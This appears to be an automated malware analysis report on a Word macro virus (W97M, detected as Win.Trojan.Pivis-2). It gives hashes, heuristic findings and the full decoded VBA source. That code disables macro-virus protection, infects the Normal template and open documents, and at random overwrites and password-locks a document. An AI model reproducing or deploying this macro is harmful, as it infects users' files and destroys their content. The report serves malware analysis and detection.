Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 740d54bba65a73bc…

MALICIOUS

Office (OLE)

Size: 27.5 KB
Created: 2001-08-28 16:48:00
Authoring application: Microsoft Word 10.0
First seen: 2014-02-09
MD5: 90cf8c205078210d7fd15589b9f0a71b
SHA-1: 817f6cc4d7415143a1ee485ad6eba09a5bb85356
SHA-256: 740d54bba65a73bc77d0fe12bb0e85219ede034dbfdebf698e757c128bf15c94
Risk score: 148

Heuristics (4)

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1950 bytes
SHA-256: bc9a5185b76854c0365f0103b75d3070d796216b32e3559a6f6d025d4accd598

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Randomize Timer
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule
Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule
If Normalcl.countoflines > 0 Then GoTo InfecteerDeHap
viruscode = Activecl.lines(1, Activecl.countoflines)
Normalcl.insertlines 1, viruscode
InfecteerDeHap:
If Activecl.countoflines > 0 Then GoTo Doeii
viruscode = Normalcl.lines(1, Normalcl.countoflines)
Activecl.insertlines 1, viruscode
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Fileformat:=wdDocument
Doeii:
x = Int(Rnd * 100)
If x = 11 Then MsgBox "w97.LAM by LiFEwiRE [www.shadowvx.org]", , "...::LiFEwiRE::..."
If x = 25 Then ActiveDocument.Content = "LiFEwiRE2000 - www.shadowvx.org": ActiveDocument.Password = "pietje"
With ActiveDocument.VBProject.VBComponents.Item(1).codemodule
.ReplaceLine 39, "Sub ToolsMacro()"
.ReplaceLine 40, "'(c) LiFEwiRE 2000"
.ReplaceLine 42, "Sub ViewVBCode()"
.ReplaceLine 43, "'www.coderz.net - www.shadowvx.org"
End With
'(c) 2OOO by LiFEwiRE... writt3n 4g4inst my phucking 3x-sk3wl... i c4n c0de ring0 p0ly P3 1nf3ct0rs, but w0rd is 4 b3tt3r
't4rg3t in w97... I kn0w this c0d3 w0n't spr34d 0utzide sk3wl, wh0 cares? Th3 b3tt3r!
End Sub

Private Sub Document_new()
Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule
Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule
viruscode = Normalcl.lines(1, Normalcl.countoflines)
Activecl.insertlines 1, viruscode
ActiveDocument.Saved = True
End Sub